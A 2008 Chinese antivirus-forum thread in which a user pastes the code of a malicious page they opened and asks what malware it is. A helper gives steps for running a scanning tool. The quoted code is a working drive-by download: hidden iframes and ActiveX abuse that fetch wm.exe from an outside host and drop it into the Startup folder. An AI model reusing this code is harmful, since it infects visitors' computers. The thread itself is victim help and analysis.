daliwan - 2008-7-29 21:28:00
今天我收到一个这样的网页文件,代码是:
<iframe src=http://%77%77%77%2e%73%61%6e%73%61%6e%73%2e%63%6e/wm/ width=0 height=0></iframe>
我不小心打开了,这个应该肯定是病毒把,大家帮我看看是什么病毒,或者木马.谢谢
打开文件后
就会到这个
<iframe src=http://www.sansans.cn/wm/office.htm width=0 height=0></iframe>
<iframe src=http://www.sansans.cn/wm/sina.htm width=0 height=0></iframe>
然后
<HTML><HEAD>
<META http-equiv=Content-Type content=”text/html; charset=gb2312″>
<META content=”MSHTML 6.00.2900.3354″ name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1=”http://www.sansans.cn/wm/wm.exe”;
install[”DownloadAndInstall”](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>
最后
<html>
<object classid=’clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id=’obj’></object>
<script language=’javascript’>
var buf1 = ‘http://www.sansans.cn/wm/wm.exe’;
var buf2 = ‘C:/Documents and Settings/All Users/「开始」菜单/程序/启动/wm.exe’;
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>
这个人的目的是想让我下载wm.exe ,然后自动运行这个文件,
大伙帮我分析一下这个文件是什么病毒,我看看我的电脑现在是不是安全,怎么杀掉它
d
天云一剑 - 2008-7-29 21:51:00
下载一个
置顶贴里的SRENG工具(
点击进2楼下载)
使用它扫描日志,将日志作为附件上传上来。
操作方法:
1、下载后解压缩,运行SREngLdr.exe;
2、如果无法打开尝试把SREngLdr.exe改名为123.BAT运行;
3、依次点击【智能扫描】-【扫描】,耐心等待,扫描结束后点击【保存报告】;
4、选择保存路径,文件名保持默认,直接点击【保存】,存为TXT格式;
5、
将保存的报告附件上传而不是粘贴到帖子注意:
扫描前请尽量关闭QQ、游戏、下载工具、媒体播放器等一切应用程序,扫描完毕后操作好像是征途木马
© 2000 - 2026 Rising Corp. Ltd.